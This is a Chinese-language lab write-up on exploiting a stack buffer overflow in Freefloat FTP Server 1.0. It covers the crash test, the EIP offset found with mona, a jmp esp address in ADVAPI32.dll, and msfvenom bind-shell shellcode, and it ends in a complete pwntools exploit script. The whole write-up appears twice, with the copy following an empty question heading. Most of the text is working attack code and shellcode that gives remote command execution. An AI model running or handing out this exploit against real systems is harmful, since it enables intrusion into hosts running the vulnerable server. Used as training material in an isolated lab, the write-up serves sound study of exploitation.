Freefloat_FTP_Server1.0
0x00 基本介绍
此处以Freefloat FTP Server1.0为例
- 测试软件:Freefloat FTP Server1.0
- 虚拟机:Windows XP Pro Sp3
- 工具:Immunity Debugger、Pwntools、Metasploit
0x01 溢出
#测试脚本
from pwn import *
p = remote("192.168.137.128", 21)
payload = 'A'*500
p.sendline(payload)
p.interactive()
!https://s3-us-west-2.amazonaws.com/secure.notion-static.com/3998ca97-30bd-4a8a-9dfc-dab229c82dd4/Untitled.png
EIP被覆盖为41414141,即AAAA,如果将这个AAAA替换成我们准备好的指令地址,就能执行任意指令,同时我们需要知道这个指令覆盖的偏移量,即这500个字符哪四个字符刚好可以覆盖EIP的位置。
0x02 偏移量
Mona
#生成500个垃圾字符
!mona pc 500
//Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4
替换原有的垃圾字符
from pwn import *
p = remote("192.168.137.128", 21)
#payload = 'A'*500
payload ='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4'
p.sendline(payload)
p.interactive()
重新运行溢出脚本:EIP=34694133
!mona po 34694133
#found in cyclic pattern at position 251
偏移量为251
0x03 跳板技术JMP ESP
查找jmp esp地址
!https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ebd9da0e-1ac2-4940-a0a8-5fd16cf70d41/Untitled.png
选择
Message= 0x77dbf049 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x04 Shellcode
滑板:
‘\x90’*20
生成Shellcode
msfvenom -p windows/shell_bind_tcp LHOSTS=192.168.137.1 LPORT=4444 -b '\x00\x0a\x0d' -f c
"\xda\xc1\xbb\x1a\xf9\xbf\x94\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xc2\x04\x31\x5a\x13\x03\x40\xea\x5d\x61\x88\xe4\x20"
"\x8a\x70\xf5\x44\x02\x95\xc4\x44\x70\xde\x77\x75\xf2\xb2\x7b"
"\xfe\x56\x26\x0f\x72\x7f\x49\xb8\x39\x59\x64\x39\x11\x99\xe7"
"\xb9\x68\xce\xc7\x80\xa2\x03\x06\xc4\xdf\xee\x5a\x9d\x94\x5d"
"\x4a\xaa\xe1\x5d\xe1\xe0\xe4\xe5\x16\xb0\x07\xc7\x89\xca\x51"
"\xc7\x28\x1e\xea\x4e\x32\x43\xd7\x19\xc9\xb7\xa3\x9b\x1b\x86"
"\x4c\x37\x62\x26\xbf\x49\xa3\x81\x20\x3c\xdd\xf1\xdd\x47\x1a"
"\x8b\x39\xcd\xb8\x2b\xc9\x75\x64\xcd\x1e\xe3\xef\xc1\xeb\x67"
"\xb7\xc5\xea\xa4\xcc\xf2\x67\x4b\x02\x73\x33\x68\x86\xdf\xe7"
"\x11\x9f\x85\x46\x2d\xff\x65\x36\x8b\x74\x8b\x23\xa6\xd7\xc4"
"\x80\x8b\xe7\x14\x8f\x9c\x94\x26\x10\x37\x32\x0b\xd9\x91\xc5"
"\x6c\xf0\x66\x59\x93\xfb\x96\x70\x50\xaf\xc6\xea\x71\xd0\x8c"
"\xea\x7e\x05\x38\xe2\xd9\xf6\x5f\x0f\x99\xa6\xdf\xbf\x72\xad"
"\xef\xe0\x63\xce\x25\x89\x0c\x33\xc6\xa4\x90\xba\x20\xac\x38"
"\xeb\xfb\x58\xfb\xc8\x33\xff\x04\x3b\x6c\x97\x4d\x2d\xab\x98"
"\x4d\x7b\x9b\x0e\xc6\x68\x1f\x2f\xd9\xa4\x37\x38\x4e\x32\xd6"
"\x0b\xee\x43\xf3\xfb\x93\xd6\x98\xfb\xda\xca\x36\xac\x8b\x3d"
"\x4f\x38\x26\x67\xf9\x5e\xbb\xf1\xc2\xda\x60\xc2\xcd\xe3\xe5"
"\x7e\xea\xf3\x33\x7e\xb6\xa7\xeb\x29\x60\x11\x4a\x80\xc2\xcb"
"\x04\x7f\x8d\x9b\xd1\xb3\x0e\xdd\xdd\x99\xf8\x01\x6f\x74\xbd"
"\x3e\x40\x10\x49\x47\xbc\x80\xb6\x92\x04\xb0\xfc\xbe\x2d\x59"
"\x59\x2b\x6c\x04\x5a\x86\xb3\x31\xd9\x22\x4c\xc6\xc1\x47\x49"
"\x82\x45\xb4\x23\x9b\x23\xba\x90\x9c\x61";
0x05 Pwn
最终攻击代码
from pwn import *
p = remote("192.168.137.128", 21)
payload ='\x41'*251
eip='\x49\xf0\xdb\x77'
sled='\x90'*20
shellcode=("\xda\xc1\xbb\x1a\xf9\xbf\x94\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xc2\x04\x31\x5a\x13\x03\x40\xea\x5d\x61\x88\xe4\x20"
"\x8a\x70\xf5\x44\x02\x95\xc4\x44\x70\xde\x77\x75\xf2\xb2\x7b"
"\xfe\x56\x26\x0f\x72\x7f\x49\xb8\x39\x59\x64\x39\x11\x99\xe7"
"\xb9\x68\xce\xc7\x80\xa2\x03\x06\xc4\xdf\xee\x5a\x9d\x94\x5d"
"\x4a\xaa\xe1\x5d\xe1\xe0\xe4\xe5\x16\xb0\x07\xc7\x89\xca\x51"
"\xc7\x28\x1e\xea\x4e\x32\x43\xd7\x19\xc9\xb7\xa3\x9b\x1b\x86"
"\x4c\x37\x62\x26\xbf\x49\xa3\x81\x20\x3c\xdd\xf1\xdd\x47\x1a"
"\x8b\x39\xcd\xb8\x2b\xc9\x75\x64\xcd\x1e\xe3\xef\xc1\xeb\x67"
"\xb7\xc5\xea\xa4\xcc\xf2\x67\x4b\x02\x73\x33\x68\x86\xdf\xe7"
"\x11\x9f\x85\x46\x2d\xff\x65\x36\x8b\x74\x8b\x23\xa6\xd7\xc4"
"\x80\x8b\xe7\x14\x8f\x9c\x94\x26\x10\x37\x32\x0b\xd9\x91\xc5"
"\x6c\xf0\x66\x59\x93\xfb\x96\x70\x50\xaf\xc6\xea\x71\xd0\x8c"
"\xea\x7e\x05\x38\xe2\xd9\xf6\x5f\x0f\x99\xa6\xdf\xbf\x72\xad"
"\xef\xe0\x63\xce\x25\x89\x0c\x33\xc6\xa4\x90\xba\x20\xac\x38"
"\xeb\xfb\x58\xfb\xc8\x33\xff\x04\x3b\x6c\x97\x4d\x2d\xab\x98"
"\x4d\x7b\x9b\x0e\xc6\x68\x1f\x2f\xd9\xa4\x37\x38\x4e\x32\xd6"
"\x0b\xee\x43\xf3\xfb\x93\xd6\x98\xfb\xda\xca\x36\xac\x8b\x3d"
"\x4f\x38\x26\x67\xf9\x5e\xbb\xf1\xc2\xda\x60\xc2\xcd\xe3\xe5"
"\x7e\xea\xf3\x33\x7e\xb6\xa7\xeb\x29\x60\x11\x4a\x80\xc2\xcb"
"\x04\x7f\x8d\x9b\xd1\xb3\x0e\xdd\xdd\x99\xf8\x01\x6f\x74\xbd"
"\x3e\x40\x10\x49\x47\xbc\x80\xb6\x92\x04\xb0\xfc\xbe\x2d\x59"
"\x59\x2b\x6c\x04\x5a\x86\xb3\x31\xd9\x22\x4c\xc6\xc1\x47\x49"
"\x82\x45\xb4\x23\x9b\x23\xba\x90\x9c\x61")
last=payload+eip+sled+shellcode
p.sendline(last)
p.interactive()
攻击效果如图:
!https://s3-us-west-2.amazonaws.com/secure.notion-static.com/f244a500-0ae1-45ec-94d2-38d0ab05b287/Untitled.png
0x06 疑问
0x00 基本介绍
此处以Freefloat FTP Server1.0为例
- 测试软件:Freefloat FTP Server1.0
- 虚拟机:Windows XP Pro Sp3
- 工具:Immunity Debugger、Pwntools、Metasploit
0x01 溢出
#测试脚本
from pwn import *
p = remote("192.168.137.128", 21)
payload = 'A'*500
p.sendline(payload)
p.interactive()
!https://s3-us-west-2.amazonaws.com/secure.notion-static.com/3998ca97-30bd-4a8a-9dfc-dab229c82dd4/Untitled.png
EIP被覆盖为41414141,即AAAA,如果将这个AAAA替换成我们准备好的指令地址,就能执行任意指令,同时我们需要知道这个指令覆盖的偏移量,即这500个字符哪四个字符刚好可以覆盖EIP的位置。
0x02 偏移量
Mona
#生成500个垃圾字符
!mona pc 500
//Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4
替换原有的垃圾字符
from pwn import *
p = remote("192.168.137.128", 21)
#payload = 'A'*500
payload ='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4'
p.sendline(payload)
p.interactive()
重新运行溢出脚本:EIP=34694133
!mona po 34694133
#found in cyclic pattern at position 251
偏移量为251
0x03 跳板技术JMP ESP
查找jmp esp地址
!https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ebd9da0e-1ac2-4940-a0a8-5fd16cf70d41/Untitled.png
选择
Message= 0x77dbf049 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x04 Shellcode
滑板:
‘\x90’*20
生成Shellcode
msfvenom -p windows/shell_bind_tcp LHOSTS=192.168.137.1 LPORT=4444 -b '\x00\x0a\x0d' -f c
"\xda\xc1\xbb\x1a\xf9\xbf\x94\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xc2\x04\x31\x5a\x13\x03\x40\xea\x5d\x61\x88\xe4\x20"
"\x8a\x70\xf5\x44\x02\x95\xc4\x44\x70\xde\x77\x75\xf2\xb2\x7b"
"\xfe\x56\x26\x0f\x72\x7f\x49\xb8\x39\x59\x64\x39\x11\x99\xe7"
"\xb9\x68\xce\xc7\x80\xa2\x03\x06\xc4\xdf\xee\x5a\x9d\x94\x5d"
"\x4a\xaa\xe1\x5d\xe1\xe0\xe4\xe5\x16\xb0\x07\xc7\x89\xca\x51"
"\xc7\x28\x1e\xea\x4e\x32\x43\xd7\x19\xc9\xb7\xa3\x9b\x1b\x86"
"\x4c\x37\x62\x26\xbf\x49\xa3\x81\x20\x3c\xdd\xf1\xdd\x47\x1a"
"\x8b\x39\xcd\xb8\x2b\xc9\x75\x64\xcd\x1e\xe3\xef\xc1\xeb\x67"
"\xb7\xc5\xea\xa4\xcc\xf2\x67\x4b\x02\x73\x33\x68\x86\xdf\xe7"
"\x11\x9f\x85\x46\x2d\xff\x65\x36\x8b\x74\x8b\x23\xa6\xd7\xc4"
"\x80\x8b\xe7\x14\x8f\x9c\x94\x26\x10\x37\x32\x0b\xd9\x91\xc5"
"\x6c\xf0\x66\x59\x93\xfb\x96\x70\x50\xaf\xc6\xea\x71\xd0\x8c"
"\xea\x7e\x05\x38\xe2\xd9\xf6\x5f\x0f\x99\xa6\xdf\xbf\x72\xad"
"\xef\xe0\x63\xce\x25\x89\x0c\x33\xc6\xa4\x90\xba\x20\xac\x38"
"\xeb\xfb\x58\xfb\xc8\x33\xff\x04\x3b\x6c\x97\x4d\x2d\xab\x98"
"\x4d\x7b\x9b\x0e\xc6\x68\x1f\x2f\xd9\xa4\x37\x38\x4e\x32\xd6"
"\x0b\xee\x43\xf3\xfb\x93\xd6\x98\xfb\xda\xca\x36\xac\x8b\x3d"
"\x4f\x38\x26\x67\xf9\x5e\xbb\xf1\xc2\xda\x60\xc2\xcd\xe3\xe5"
"\x7e\xea\xf3\x33\x7e\xb6\xa7\xeb\x29\x60\x11\x4a\x80\xc2\xcb"
"\x04\x7f\x8d\x9b\xd1\xb3\x0e\xdd\xdd\x99\xf8\x01\x6f\x74\xbd"
"\x3e\x40\x10\x49\x47\xbc\x80\xb6\x92\x04\xb0\xfc\xbe\x2d\x59"
"\x59\x2b\x6c\x04\x5a\x86\xb3\x31\xd9\x22\x4c\xc6\xc1\x47\x49"
"\x82\x45\xb4\x23\x9b\x23\xba\x90\x9c\x61";
0x05 Pwn
最终攻击代码
from pwn import *
p = remote("192.168.137.128", 21)
payload ='\x41'*251
eip='\x49\xf0\xdb\x77'
sled='\x90'*20
shellcode=("\xda\xc1\xbb\x1a\xf9\xbf\x94\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xc2\x04\x31\x5a\x13\x03\x40\xea\x5d\x61\x88\xe4\x20"
"\x8a\x70\xf5\x44\x02\x95\xc4\x44\x70\xde\x77\x75\xf2\xb2\x7b"
"\xfe\x56\x26\x0f\x72\x7f\x49\xb8\x39\x59\x64\x39\x11\x99\xe7"
"\xb9\x68\xce\xc7\x80\xa2\x03\x06\xc4\xdf\xee\x5a\x9d\x94\x5d"
"\x4a\xaa\xe1\x5d\xe1\xe0\xe4\xe5\x16\xb0\x07\xc7\x89\xca\x51"
"\xc7\x28\x1e\xea\x4e\x32\x43\xd7\x19\xc9\xb7\xa3\x9b\x1b\x86"
"\x4c\x37\x62\x26\xbf\x49\xa3\x81\x20\x3c\xdd\xf1\xdd\x47\x1a"
"\x8b\x39\xcd\xb8\x2b\xc9\x75\x64\xcd\x1e\xe3\xef\xc1\xeb\x67"
"\xb7\xc5\xea\xa4\xcc\xf2\x67\x4b\x02\x73\x33\x68\x86\xdf\xe7"
"\x11\x9f\x85\x46\x2d\xff\x65\x36\x8b\x74\x8b\x23\xa6\xd7\xc4"
"\x80\x8b\xe7\x14\x8f\x9c\x94\x26\x10\x37\x32\x0b\xd9\x91\xc5"
"\x6c\xf0\x66\x59\x93\xfb\x96\x70\x50\xaf\xc6\xea\x71\xd0\x8c"
"\xea\x7e\x05\x38\xe2\xd9\xf6\x5f\x0f\x99\xa6\xdf\xbf\x72\xad"
"\xef\xe0\x63\xce\x25\x89\x0c\x33\xc6\xa4\x90\xba\x20\xac\x38"
"\xeb\xfb\x58\xfb\xc8\x33\xff\x04\x3b\x6c\x97\x4d\x2d\xab\x98"
"\x4d\x7b\x9b\x0e\xc6\x68\x1f\x2f\xd9\xa4\x37\x38\x4e\x32\xd6"
"\x0b\xee\x43\xf3\xfb\x93\xd6\x98\xfb\xda\xca\x36\xac\x8b\x3d"
"\x4f\x38\x26\x67\xf9\x5e\xbb\xf1\xc2\xda\x60\xc2\xcd\xe3\xe5"
"\x7e\xea\xf3\x33\x7e\xb6\xa7\xeb\x29\x60\x11\x4a\x80\xc2\xcb"
"\x04\x7f\x8d\x9b\xd1\xb3\x0e\xdd\xdd\x99\xf8\x01\x6f\x74\xbd"
"\x3e\x40\x10\x49\x47\xbc\x80\xb6\x92\x04\xb0\xfc\xbe\x2d\x59"
"\x59\x2b\x6c\x04\x5a\x86\xb3\x31\xd9\x22\x4c\xc6\xc1\x47\x49"
"\x82\x45\xb4\x23\x9b\x23\xba\x90\x9c\x61")
last=payload+eip+sled+shellcode
p.sendline(last)
p.interactive()
攻击效果如图:
!https://s3-us-west-2.amazonaws.com/secure.notion-static.com/f244a500-0ae1-45ec-94d2-38d0ab05b287/Untitled.png